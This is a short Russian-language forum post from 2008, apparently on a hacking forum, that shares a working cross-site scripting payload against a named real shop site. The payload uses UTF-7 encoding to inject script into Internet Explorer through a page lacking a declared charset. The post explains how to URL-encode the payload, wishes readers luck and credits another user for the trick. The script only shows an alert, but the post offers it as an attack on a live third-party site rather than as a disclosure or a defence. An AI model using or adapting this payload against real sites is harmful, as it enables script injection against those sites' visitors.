27.04.2008, 22:10
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
XSS в ИЕ
Код:
http://icqshop.voland-lab.com/?page=%2BADw-script%2BAD4-alert%28%29%2BADw-%2Fscript%2BAD4-
берём <script>alert()</script> Т.к не указана точная кодировка страницы можно применять UTF-7
Но вот беда в нём присудствует знак +(если ввести в урл будет пробел) НО
кодируем в урл и получаем
%2BADw-script%2BAD4-alert%28%29%2BADw-%2Fscript%2BAD4-
удачи... научился этому у Flame of soul |
|
|